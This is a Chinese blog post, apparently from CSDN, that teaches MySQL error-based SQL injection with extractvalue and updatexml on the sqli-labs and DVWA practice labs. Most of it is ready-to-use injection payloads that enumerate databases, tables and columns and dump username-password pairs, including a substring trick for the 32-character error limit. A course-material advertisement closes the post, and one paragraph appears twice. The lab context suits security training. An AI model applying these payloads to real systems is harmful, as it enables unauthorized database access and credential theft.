小白报错注入学习(以extractvalue函数报错为例)_extractvaluestopoints失败

最新推荐文章于 2024-07-23 21:39:06 发布
最新推荐文章于 2024-07-23 21:39:06 发布
阅读量880 收藏 25
点赞数 7
分类专栏: 程序员 文章标签: 学习 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84972870/article/details/138866430
版权

1’ union select 1,database() #

爆表名:

1’ union select 1,

group_concat(table_name)

//使用GROUP\_CONCAT(table\_name)将表名连接为一个字符串,并使用逗号作为分隔符。

from information_schema.tablesinformation\_schema

是MySQL提供的一个系统数据库,其中包含有关数据库和表的元数据信息。

where table_schema=database()#

爆字段名

1’ union select 1,group_concat(column_name)

from information_schema.columns

where table_name=‘users’ and table_schema=‘dvwa’#

1’ union select group_concat(user),group_concat(password) from users#

2.什么是报错注入?extractvalue报错注入又是什么?

Less5:?id=1’ union select 1,2,databaae() --+

从 mysql5.1.5 开始提供两个 XML 查询和修改的函数,extractvalue 和 updatexml

extractvalue 负责在 xml 文档中按照 xpath 语法查询节点内容

updatexml 则负责修改查询到的内容:

3.报错注入会用到什么函数?

updatexml()与extractvalue()

updatexml (A, B, C)

A:String 格式,XML 文档对象的名称

B:XPath_string (Xpath格式的字符串)

C:String 格式,替换查找到的符合条件的数据

extractvalue(A,B)

A:string格式,为xml文档对象的名称

B:Xpath_string是xpath格式的字符串

4.报错注入payload

如上所知extractvalue(A,B)中函数B是要属于xpath格式的字符串,`  ~  $  #

利用这点,构造payload

payload:

id=1’and(select extractvalue(“anything”,concat(‘~’,(select语句))))

5.漏洞利用流程(sqllib靶场Less_5)

拿到注入点:

  1. 先分析是 字符型/数字型

数字型注入

or 1=1——回复正常,与原始页面无差别

and 1=2——回复正常,与原始页面有差别

字符型注入

and 1=1 --+    回显正常

and 1=2 --+    回显异常

  1. 判断列数

1’ order by 1 --+

  1. 构造payload

?id=1’ union select extractvalue (1,concat(0x7e,(SQL语句)))  --+

爆库名

?id=1’ union select 1,2,extractvalue (1,concat(0x7e,(select database())))  --+

爆表名

?id=1’ union select 1,2,extractvalue (1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’)))  --+

爆字段名

?id=1’ union select 1,2,extractvalue (1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=‘users’)))  --+

?id=1’ union select 1,2,extractvalue (1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’)))  --+

查询内容

?id=1’ union select 1,2,extractvalue (1,concat(0x7e,(select group_concat(username,‘-’,password) from security.users)))  --+

截取内容

?id=1’ union select 1,2,extractvalue (1,concat(0x7e,(select substring(group_concat(username,‘-’,password),1,30) from security.users)))  --+

因为一次报错的内容限制32个字符,所以我们用substring截取

Substring(A,B,C)函数

A:参数字符串

B:开始截取的位置

C:截取长度

6.知道extractvalue()懂updatexml()

extractvalue(A,B)

A:string格式,为xml文档对象的名称

B:Xpath_string是xpath格式的字符串

updatexml (A, B, C)

最后

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

img

img

img

img

img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!

如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

046076)]

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!

如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

2401_84972870
关注
专栏目录
24-2 SQL注入 - 利用报错函数 floor 带回回显
weixin_43263566的博客
02-09 715
这个函数用于计算满足某一条件下的行数,是SQL中的一个聚合函数,常用于统计查询结果中的记录数。: 生成一个0到1之间的随机浮点数。每次调用时,都会产生一个新的随机数。: 用于结合聚合函数,按照一个或多个列对结果集进行分组。: 向下取整函数,可以将其参数值向下舍入到最接近的整数。语句中只能包含聚合函数或在。
SQL注入系列篇 | 报错注入
d59hao的博客
05-05 973
报错注入是通过构造恶意SQL,使数据库报错,从报错信息中得到敏感信息的方法。如果服务器应用没有对这种错误进行处理,则攻击者可以通过页面的错误回显获取数据。
extractvalue报错注入
bangyan3903的博客
08-18 3569
查看源码 $uagent = $_SERVER['HTTP_USER_AGENT']; ………… $uname = check_input($_POST['uname']); $passwd = check_input($_POST['passwd']); ………… $sql="SELECT users.username, users.password FROM users...
SQL注入——extractValue()报错注入
heyingcheng的博客
03-06 3163
在实际的注入过程中,查询的列(比如本例中的doc)是不用管的,随便写就可以。因为我们关注的是后面查询的更重要的东西(database)于是我们想到,如果在报错之前执行一下select语句,然后在报错提醒信息那里回显出我们想要的数据信息就好了,这就是报错注入。这条命令的意思是,想要显示的内容123456,这句话的意思是从第一个字符开始显示,显示后面的三个,即123。同理,从第31个字符开始显示,显示后面的30个字符。比如在本例中把查询参数的路径写错,页面上只会显示查询不到内容,但是不会报错
小白报错注入学习(以extractvalue函数报错为例
qq_35075142的博客
04-18 320
XPath_string (Xpath格式的字符串):XPath_string (Xpath格式的字符串):Xpath_string是xpath格式的字符串。:Xpath_string是xpath格式的字符串。:String 格式,替换查找到的符合条件的数据。:String 格式,替换查找到的符合条件的数据。:String 格式,XML 文档对象的名称。:String 格式,XML 文档对象的名称。如果要等效为联合注入的格式的话,是这样子:1。:string格式,为xml文档对象的名称。
SQL注入——基于报错的注入【extractvalue()】篇
大大怪将军,你来啦!
03-31 825
这种格式,如果写入其他格式就会报错,并且会返回写入的非法格式内容,错误信息如:XPATH syntax error:'xxxxxxxx’。:extractvalue() 函数所能显示的错误信息最大长度为32,如果错误信息超过了最大长度,有可能导致显示不全。基于报错的注入,是指通过构造特定的SQL语句,让攻击者想要查询的信息(如数据库名、版本号、用户名等)通过页面的错误提示回显出来。常用的报错功能函数包括extractvalue()、updatexml()、floor()、exp()等。
SQL注入报错注入
qq_45557130的博客
10-07 592
sql注入报错注入
69.网络安全渗透测试—[SQL注入篇8]—[MySQL+PHP-报错注入读写文件]
qwsn
01-18 2202
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、报错注入-读取文件 1、extractvalue()/exp() 读取文件 二、报错注入-伪写入文件 1、exp()伪写入文件
PHP正则替换函数preg_replace()报错:Notice Use of undefined constant的解决方法分析
10-20
主要介绍了PHP正则替换函数preg_replace()报错:Notice Use of undefined constant的解决方法,结合具体实例形式分析了preg_replace()报错的原因与相关解决技巧,需要的朋友可以参考下
WebDriverWait 函数报错:Exception found __init__() takes 2 positional arguments but 3 were given
weixin_39080072的博客
03-19 2865
文章目录代码功能介绍错误类型错误截图错误代码错误原因分析正确代码更新 代码功能介绍 代码流程:登录百度云网盘,点击“账号密码登录”,输入账号、密码,点击“登录”按钮,登录之后会跳出广告页面,获取元素将其关闭。选择自己百度云中的某一文件进行“删除”操作(此代码未实现删除) 错误类型 Exception found init() takes 2 positional arguments but 3 w...
sqli-labs less-1(报错注入extractvalue)
不知名白帽的博客
07-16 504
sqli-labs less-1(报错注入extractvalue)
sql盲注_extractvalue报错注入
sugar_by的博客
06-02 1036
什么是报错注入 这是一种页面响应形式,响应过程如下: 用户1在前台页面输入检索内容------>后台将前台页面上输入的检索内容无加区别的拼成sql语句,送到数据库执行------->数据库将执行的结果无加区别的显示到前台页面上 俩个“无加区别”后台对输入输出的合理性没有做检查 也就是说输入进去的内容和输出的内容不做检查的 那什么时候用报错注入呢? 构造语句,让错误信息中夹杂可以显示数据库内容的查询语句 返回报错提示中包含数据库中的内容 命令对但是不回显 但是报错是......
extractvalue报错注入理论及实战
走马
11-07 1137
什么是报错注入构造语句,让错误信息中夹杂可以显示数据库内容的查询语句,返回报错提示中包括数据库中的内容如上图所示,通过group by的报错,我们可以知道列数是多少输入正确的查询数据库的SQL语句,虽然可以执行成功,但是页面不显示数据库的名称我们故意将database写为databasa,此时数据库的名称security在报错信息中显示了出来因此可以利用报错的信息得到我们想要的信息。1.通过floor()报错注入2.通过extractvalue()报错注入
sqli-labs-less-17 extractvalue报错注入
yzcn
11-13 313
Less-17 extractvalue报错注入 找寻注入点: 首先用burp suite抓包,得到post信息后,用hackbar进行测试 经过测试发现,无论怎样对uname进行测试,都显示失败,猜测是对uname进行了过滤,我们考虑从password进行注入: 该关卡是对密码进行更改,如果用户名正确,则修改密码为新密码,如果用户名错误,则返回失败, 因此该关卡需先知道一个用户名admin Sql知识: extractvalue(xml_frag,xpath_expr)使用xpath表示法从xml字符串中
基于联合查询的字符型GET注入
Z_l123的博客
02-16 1147
1.访问SQLi-Labs网站 访问Less-1,并根据网页提示给定一个GET参数 http://127.0.0.1/sqli-labs/Less-1/?id=1 2.寻找注入点 分别使用以下3条payload寻找注入点及判断注入点的类型: http://127.0.0.1/sqli-labs/Less-1/?id=1' 运行后报错! http://127.0.0.1/sqli-labs/Less-1/?id=1' and '1'='1 运行后正常显示! http:/.
MYSQL 通过ExtractValue()报错注入
Ciyaso的博客
01-18 4199
函数解释: extractvalue():从目标XML中返回包含所查询值的字符串。   EXTRACTVALUE (XML_document, XPath_string);   第一个参数:XML_document是String格式,为XML文档对象的名称   第二个参数:XPath_string (Xpath格式的字符串)   concat:返回结果为连接参数产生的字符串。 报错原理 例如:SELECT ExtractValue('<a><b><b/></a&gt
【SQL注入】基于extractvalue()的报错注入原理
开水的博客
02-18 562
函数是MySQL数据库中用于提取XML数据中指定路径的值的函数。它基于XPath语法,允许用户根据特定的路径表达式从XML格式的数据中获取所需信息。以下是关于MySQL中。
【sql注入-报错注入1】extractvalue()函数 报错注入
07-10 3257
报错注入extractvalue()函数的使用
几种常见的报错注入类型详解
最新发布
m0_74312676的博客
07-23 1228
报错注入是一种通过引起数据库报错并从错误信息中提取有用信息的SQL注入攻击手法;攻击者利用数据库在处理异常情况时返回的错误消息,来推断出数据库结构、字段名甚至数据内容;这种攻击方法依赖于数据库将详细的错误消息返回给客户端。若在测试时发现网页会回显sql相关的报错信息,那么此时就可以尝试使用错误注入这种方式进行渗透。可以利用报错注入的前提:就是页面有错误信息显示出来、保证函数能够正确执行。
extractvalue报错注入需要猜解字段吗
05-30
是的,使用 extractvalue 函数进行注入时,需要先猜解出目标数据库中的字段名和表名,才能进行注入。因为 extractvalue 函数需要指定要查询的字段名和表名,如果不知道这些信息,无法进行有效的注入。因此,常见的 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值